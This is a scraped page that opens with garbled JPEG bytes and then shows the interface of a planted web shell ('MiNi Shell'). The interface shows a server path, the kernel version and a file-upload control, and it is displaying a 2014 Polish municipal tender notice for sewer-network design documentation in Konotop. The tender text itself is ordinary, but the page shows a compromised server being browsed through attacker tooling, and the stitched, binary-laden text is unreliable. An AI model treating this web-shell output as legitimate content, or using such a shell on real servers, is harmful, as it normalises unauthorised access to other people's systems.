JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140625/135741-N-2014.html

<p class="kh_header"><b>Kolsko: Wykonanie dokumentacji projektowej budowy sieci kanalizacji sanitarnej
wraz z przyłączami w miejscowości Konotop</b><br>
<b>Numer ogłoszenia: 135741 - 2014; data zamieszczenia: 25.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kolsko , ul. Piastowska 12, 67-415 Kolsko, woj. lubuskie, tel. 068 3524177, faks 068 3524355.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej budowy sieci kanalizacji sanitarnej
wraz z przyłączami w miejscowości Konotop.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowej obejmującej budowę sieci kanalizacji sanitarnej w miejscowości Konotop, gm. Kolsko wraz z włączeniem do czynnej sieci kanalizacji sanitarnej odprowadzającej ścieki do zbiornika wyrównawczego bezodpływowego. Łączna długość sieci kanalizacji sanitarnej do zaprojektowania wynosi około 9 km, w tym przyłącza do około 270 budynków.
1.2. Teren, który należy objąć zakresem prac projektowych, zobrazowany jest na załączniku graficznym do niniejszej SIWZ - załącznik nr 6.
1.3. Niektóre obszary, które należy objąć zakresem prac projektowych objęte są aktualnymi Miejscowymi Planami Zagospodarowania Przestrzennego. Obszary te widoczne są na załączniku graficznym do niniejszej SIWZ - załącznik nr 6.
1.4. Teren miejscowości Konotop objęty przedmiotowym zamówieniem leży częściowo na terenie dwóch Obszarów Chronionego Krajobrazu: Rynny Obrzycko-Obrzańskie oraz Pojezierze Sławsko-Przemęckie.
1.5. Zakres przedmiotu zamówienia obejmuje w szczególności:
1) sporządzenie mapy do celów projektowych,
2) skompletowanie dokumentacji formalno-prawnej obejmującej wszelkie niezbędne pozwolenia, decyzje, uzgodnienia, opinie, warunki techniczne, wypisy z ewidencji gruntów dla działek ewidencyjnych, po których przebiegać będzie trasa projektowanej sieci, zgody właścicieli nieruchomości na wejście w teren w celu wykonania robót oraz inne wymagane do uzyskania pozwolenia na budowę dla inwestycji objętej przedmiotem opracowania,
3) sporządzenie karty informacyjnej przedsięwzięcia - w 4 egzemplarzach,
4) uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
5) uzgodnienie decyzji na lokalizację sieci w pasie drogowym dróg publicznych poszczególnych kategorii,
6) uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego dla projektowanego zadania,
7) uzyskanie pozwoleń wodnoprawnych,
8) opracowanie projektu budowlano-wykonawczego z przyłączami i innymi niezbędnymi urządzeniami, zgodnie z warunkami technicznymi, normami i wymaganymi uzgodnieniami - w 6 egzemplarzach,
9) ustalenie geotechnicznych warunków posadowienia inwestycji w postaci dokumentacji geologicznej - w egzemplarzach,
10) opracowanie dokumentacji kosztorysowej obejmującej kosztorys inwestorski i przedmiar robót - w 2 egzemplarzach,
11) opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych,
12)uzyskanie pozwolenia na budowę.
1.6.  Szczegółowe warunki realizacji przedmiotu zamówienia:
1) Wykonawca zobowiązany jest na bieżąco uzgadniać z Zamawiającym wszelkie proponowane rozwiązania projektowe w celu ich akceptacji, 
2) Wykonawca sporządzi przebieg trasy sieci kanalizacji sanitarnej w terenie i przedłoży go Zamawiającemu celem uzyskania jego akceptacji, 
3) w oparciu o sporządzoną mapę do celów projektowych Wykonawca uzyska uzgodnienia planu zagospodarowania pozytywną opinią ZUDP, 
4) przebieg trasy projektowanej sieci kanalizacji sanitarnej Wykonawca uzgodni z właścicielami działek, po których będzie ona przebiegać oraz uzyska od nich zgodę na wejście w teren w celu wykonania robót w formie umowy cywilno-prawnej, zawierającej wrysowaną trasę projektowanej sieci kanalizacji, 
5) o ile uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia będzie tego wymagało, oprócz karty informacyjnej przedsięwzięcia Wykonawca sporządzi również raport o oddziaływaniu inwestycji na środowisko, 
6) na potrzeby uzyskania wszelkich wymaganych pozwoleń wodnoprawnych, Wykonawca każdorazowo sporządzi niezbędne w tym zakresie operaty wodnoprawne, 
7) Wykonawca sporządzi zestawienie tabelaryczne projektowanych odgałęzień kanalizacyjnych zawierające co najmniej takie informacje, jak: długość, średnice, pompownie i ilości przyłączy kanalizacyjnych, 
8) o ile będą tego wymagały przyjęte przez Wykonawcę rozwiązania projektowe, sporządzi on inwentaryzację zieleni niezbędnej do ewentualnej wycinki i uzyska pozwolenia na jej wykonanie,
 9) Wykonawca uzyska wszelkie niezbędne warunki, zgody, uzgodnienia branżowe, decyzje itp. niezbędne do uzyskania decyzji o pozwoleniu na budowę, 
10) przed wystąpieniem do właściwego organu z wnioskiem o uzyskanie decyzji o pozwoleniu na budowę, Wykonawca uzgodni z Zamawiającym ostateczną wersję projektu budowlanego i wykonawczego, 
11) osoba odpowiedzialna z ramienia Wykonawcy za sporządzenie projektu zobowiązana będzie do zaakceptowania wprowadzonych w trakcie realizacji inwestycji wszelkich ewentualnych zmian do projektu, niezbędnych dla uzyskania przez Zamawiającego pozwolenia na użytkowanie obiektu wykonanego w oparciu 
o dokumentację będącą przedmiotem niniejszego zamówienia, 
12) Wykonawca sporządzi dokumentację kosztorysową, w tym kosztorys inwestorski szczegółowy i uproszczony oraz przedmiar robót zgodnie z obowiązującymi przepisami, w tym w szczególności zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym, przy czym kosztorysy i przedmiar należy wykonać odrębnie dla sieci z uwzględnieniem odcinków do pierwszej studzienki, licząc od budynku, a w przypadku, gdy na działce, na której zlokalizowany jest budynek, nie przewiduje się studzienki - do granicy tej działki i dla odcinków od budynku do pierwszej studzienki, zaś w przypadku jej braku - od budynku do granicy działki, 
13) dokumentacja projektowa w swojej treści nie może określać technologii robót, rodzajów materiałów i innych warunków w sposób utrudniający uczciwą konkurencję oraz ma być przygotowana zgodnie z ustawą Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.),
14) całość dokumentacji należy zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.) oraz zgodnie z Prawem budowlanym i innymi aktami normatywnymi.
15) Oprócz wersji papierowej całość dokumentacji ma być dostarczona na nośniku elektronicznym w formacie pdf.  Wersja cyfrowa musi zawierać te same elementy co dokumentacja w formie papierowej.
1.7. Ogólne warunki techniczne projektowania sieci kanalizacji sanitarnej: 
1) sieć kanalizacji sanitarnej grawitacyjnej wraz z odgałęzieniami zaprojektować z rur PVC (PE, PP) litych, jednorodnych klasy min. SN 8, 
2) średnice kanałów projektować zgodnie z warunkami technicznymi, obliczeniami i normami dla zapewnienia właściwej przepustowości hydraulicznej i wytrzymałości przewodów, 
3) sieć kanalizacji sanitarnej tłocznej projektować z rur PE - średnica zgodnie z warunkami technicznymi, obliczeniami i normami, 
4) kanały należy lokalizować w nieutwardzonym terenie, a w razie konieczności - wyjątkowo w poboczach jezdni, pod jezdniami lub w terenach z nawierzchnią twardą, 
5) w razie wystąpienia kolizji projektowanej sieci z istniejąca infrastrukturą, należy przedstawić propozycję likwidacji kolizji,  
6) na skrzyżowaniach ulicy, w miejscach odgałęzień sieci w drogi boczne należy zaprojektować studnie 1,0-1,2 m, 
7) studzienki rewizyjne na kanałach projektować na odcinkach prostych w odległościach nieprzekraczających 60 m i przy każdej zmianie kierunku, spadku i przekroju, 
8) należy projektować studnie z tworzywa sztucznego PP, PE, PVC, DN 0,4-1,0 m oraz studnie betonowe 1,0-1,2 m na sieci w rozstawie 150-250 m, 
9) projekt musi obejmować rozwiązanie techniczne włączenia instalacji kanalizacyjnej przyłączy do budynków, 
10) zagłębienie kanałów powinno zapewnić grawitacyjny odpływ ścieków z obiektów kanalizowanych (z wyjątkiem obiektów posiadających kondygnacje podziemne) poniżej strefy zamarzania i nie powodować kolizji z innymi urządzeniami. Ustalając zagłębienie kanału i spadek kanału, należy uwzględnić prędkość zapewniającą samooczyszczenie kanału, 
11) należy stosować takie rozwiązania techniczne, w tym odpowiednie urządzenia techniczne, które pozwolą eliminować emisje nieprzyjemnych zapachów z projektowanych systemów kanalizacyjnych.  
1.8. Ogólne warunki techniczne projektowania urządzeń kanalizacyjnych - przepompownie ścieków: 
1) przepompownie w zakresie hydrauliki, gabarytów obiektu i lokalizacji projektować zgodnie z warunkami technicznymi, 
2) średnica przepompowni musi zapewnić możliwość swobodnego montażu pomp oraz wyposażenia wewnętrznego, 
3) przepompownie projektować jako studnie podziemne żelbetowe z betonu B-45, posadowione w terenie o wysokim poziomie wód gruntowych, z włazem do pompowni wyniesionym ponad teren w wysokości 0,3-0,5 m (w przypadku lokalizacji pod ciągiem komunikacyjnym projektować pompownie przystosowane do ruchu pojazdów, z włazem przystosowanym do montażu w jezdni drogi), 
4) w projekcie przepompowni uwzględnić monitoring z zastosowaniem modułu telemetrycznego wyposażonego w modem GSM z funkcją transmisji danych w trybie GPRS oraz sterownik PLC umożliwiający realizacje funkcji sterowania pracą przepompowni ścieków, 
5) układ sterowniczy przepompowni projektować tak, aby był zainstalowany w skrzynce sterowniczej obok przepompowni. Praca pomp sterowana ma być w trybie automatycznym naprzemiennie. Praca pomp ma być załączana po osiągnięciu przez zwierciadło ścieków poziomu maksymalnego i wyłączana przy poziomie minimalnym. Stan awaryjny pracy przepompowni ma uruchamiać moduł alarmowy skrzynki sterowniczej, 
6) projektować przepompownie standardowo wyposażone w dwie pompy z wirnikiem otwartym typu Hortex. Wszystkie elementy metalowe projektować w wykonaniu nierdzewnym,  
7) na rurociągach tłocznych projektować zasuwy nożowe. Na załamaniach i odcinkach prostych co 200 m należy projektować czyszczaki. Odpowietrzniki i czyszczaki należy projektować w studniach z możliwością dojazdu sprzętu ciężkiego. Na końcu przewodu tłocznego projektować studnie rozprężne z wylotem podtopionym. Przykrycie przewodów kanalizacyjnych tłocznych i posadowienie przyjmować jak dla przewodów wodociągowych. Do budowy przewodów tłocznych stosować rury PE do kanalizacji ciśnieniowej. Czas przepływu ścieków (retencja) w rurociągu nie może być dłuższy jak 4 godziny. Przy dłuższym czasie przetrzymania należy projektować odświeżanie ścieków. 
8) należy stosować takie rozwiązania techniczne, w tym odpowiednie urządzenia techniczne, które pozwolą eliminować emisje nieprzyjemnych zapachów z projektowanych systemów kanalizacyjnych. 
1.9. Ogólne warunki techniczne projektowania zbiornika wyrównawczego bezodpływowego:
1) zespół odbioru pomiaru ścieków dopływających siecią kanalizacyjną wraz z zespołem do separacji skratek i piasku,
2) zbiornik wyrównawczy kryty z zabezpieczeniem na 4 doby z napowietrzaniem - objętość czynna,
3) zespół pomp przekazujących ścieki ze zbiornika wyrównawczego do transportu asenizacyjnego,
4) zagospodarowanie skratek i piasku na terenie usadowienia zbiornika wyrównawczego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 2.000,00 zł (słownie: dwa tysiące złotych 00/100). Wadium może być wniesione w następującej formie: a) pieniądzu, b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania niezbędnej wiedzy i doświadczenia Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, iż zrealizował - przynajmniej 2 usługi projektowe w zakresie wykonania dokumentacji projektowej budowy sieci kanalizacji sanitarnej o długości co najmniej 9 km każda,
w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 
W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy muszą spełniać łącznie.
Dla potwierdzenia spełnienia wyżej opisanego warunku Wykonawca winien złożyć dokument pn. Wykaz usług opisany w rozdziale III SIWZ, w punkcie Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
Sposób dokonania oceny: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca wykaże, że dysponuje na potrzeby wykonania zamówienia: - co najmniej jedną osobą projektującą posiadającą stosowne uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy muszą spełniać łącznie. Dla potwierdzenia spełnienia wyżej opisanego warunku Wykonawca winien złożyć dokument pn. Wykaz osób - opisany w rozdziale III SIWZ, w punkcie Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu. Sposób dokonania oceny: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego odpowiedniej sytuacji ekonomiczno - finansowej wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. W przypadku składania oferty wspólnej niniejszy warunek każdy z Wykonawców winien spełnić osobno. Dla potwierdzenia spełnienia wyżej opisanego warunku Wykonawca winien złożyć opłaconą polisę wg warunków opisanych w rozdziale III SIWZ, w punkcie Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu. Sposób dokonania oceny: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty. 2. Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość wprowadzania istotnych zmian postanowień zawartej umowy w przypadku:
a) Wykonawca może dokonywać zmiany projektantów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego projektanta. Wykonawca z własnej inicjatywy proponuje zmianę  projektantów w następujących przypadkach: 
-  śmierci, choroby lub innych zdarzeń losowych dotyczących projektanta, 
-  niewywiązywania się projektanta z obowiązków wynikających z umowy, 
- jeżeli zmiana projektanta stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji); 
b) Zamawiający może zażądać od Wykonawcy zmiany projektanta, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy lub wykonuje je nienależycie; 
c) w przypadku zmiany projektanta, nowy projektant musi spełniać wymagania określone dla danego specjalisty; 
d) Wykonawca obowiązany jest zmienić projektanta zgodnie z żądaniem  Zamawiającego w terminie wskazanym we wniosku Zamawiającego; 
